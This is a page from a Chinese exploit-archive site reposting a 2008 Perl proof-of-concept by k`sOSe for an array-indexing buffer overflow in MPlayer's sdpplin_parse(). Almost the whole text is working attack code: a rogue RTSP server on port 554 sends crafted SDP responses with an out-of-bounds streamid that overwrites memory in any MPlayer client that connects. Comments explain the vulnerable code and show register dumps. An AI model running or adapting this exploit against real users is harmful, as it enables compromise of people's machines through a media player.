首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MPlayer sdpplin_parse() Array Indexing Buffer Overflow Exploit PoC
来源:www.vfocus.net 作者:k`sOSe 发布时间:2008-03-26  

#!/usr/bin/perl

# Huston, mplayer got some vulns!  :(
# CVE-2008-0073 also apply to mplayer and vlc with some distinctions.
#
# Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box.
#
# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite
# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and
# some before it.
#
# Vulnerable code:
# sdpplin_parse_stream()
#  desc->stream_id=atoi(buf);
# spplin_parse()
#  desc->stream[stream->stream_id]=stream;
#
# Test:
# - mplayer rtsp://evilhost/evil.rm
# eax    0xa0737008  // pointer to desc->stream
# edx    0x0495badd  // "streamid" value
# edi    0x089b59e8  // pointer to stream
#
# <sdpplin_parse+731>: mov    DWORD PTR [eax+edx*4],edi

use warnings;
use strict;
use IO::Socket;

my $evil_num    =  "127467297"; # this is a 4byte offset from desc->stream


my $rtp_hello = "RTSP/1.0 200 OK\r\n".
                "CSeq: 1\r\n".
                "Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n".
                "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n".
                "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n".
                "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n".
                "StatsMask: 3\r\n\r\n";

my $rtp_evil =  "RTSP/1.0 200 OK\r\n".
                "CSeq: 2\r\n".
                "Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n".
                "vsrc: http://0.00.00.00:31337\r\n".
                "Content-base: rtsp://0.00.00.00:554/bu.rm\r\n".
                "ETag: 55370-2\r\n".
                "Session: 93033-2\r\n".
                "Content-type: application/sdp\r\n".
                "Content-length: 677\r\n\r\n".

                "v=0\r\n".
                "o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n".
                "s=realmp3\r\n".
                "i=<No author> <No copyright>\r\n".
                "c=IN IP4 0.0.0.0\r\n".
                "t=0 0\r\n".
                "a=SdpplinVersion:1610645242\r\n".
                "a=StreamCount:integer;\"1166000000\"\r\n".
                "a=Title:buffer;\"dtFabH2rNoP=\"\r\n".
                "a=range:npt=0-39.471000\r\n".
                "m=audio 0 RTP/AVP 101\r\n".    # this is referenced by "stream"
                "b=AS:128\r\n".
                "a=control:streamid=$evil_num\r\n".
                "a=range:npt=0-39.471000\r\n".
                "a=length:npt=39.471000\r\n".
                "a=rtpmap:101 X-MP3-draft-00/1000\r\n".
                "a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n".
                "a=StartTime:integer;0\r\n".
                "a=AvgBitRate:integer;128000\r\n".
                "a=SampleRate:integer;44100\r\n".
                "a=AvgPacketSize:integer;417\r\n".
                "a=Preroll:integer;1000\r\n".
                "a=NumChannels:integer;2\r\n".
                "a=MaxPacketSize:integer;1024\r\n".
                "a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n";

 

my @resps = (   $rtp_hello,
                $rtp_evil,

                "RTSP/1.0 200 OK\r\n".
                "CSeq: 3\r\n".
                "Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n".
                "Session: 93033-2\n\r".
                "Reconnect: true\n\r".
                "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r".
                "RDTFeatureLevel: 2\r\n".
                "Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n",

                "RTSP/1.0 200 OK\r\n".
                "CSeq: 4\r\n".
                "Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n".
                "Session: 93033-2\r\n\r\n",

                "RTSP/1.0 200 OK\r\n".
                "CSeq: 5\r\n".
                "Date: Sat, 22 Mar 2008 15:11:06 GMT".
                "RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n",
                );


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1);

while(my $csock = $sock->accept)
{
        foreach my $resp(@resps)
        {
                my $buf = read_from_sock($csock);
                print $csock $resp;
        }
}


sub read_from_sock()
{
        my ($sock) = @_;

        my $buffer = "";

        while(<$sock>)
        {
                return $buffer if /^\r\n$/;
                $buffer .= $_;
        }
        return $buffer;

}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·win32 Download and Execute She
·PacketTrap Networks pt360 2.0.
·VLC <= 0.8.6e Subtitle Parsing
·TFTP Server for Windows 1.4 ST
·phpBB Module XS-Mod 2.3.1 Loca
·Quick TFTP Pro 2.1 Remote SEH
·destar 0.2.2-5 Arbitrary Add N
·Exploits solidDB <= 06.00.1018
·PHP-Nuke Platinum 7.6.b.5 (dyn
·Sun Solaris rpc.ypupdated Arbi
·Visual Basic (vbe6.dll) Local
·PEEL CMS Admin Hash Extraction
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved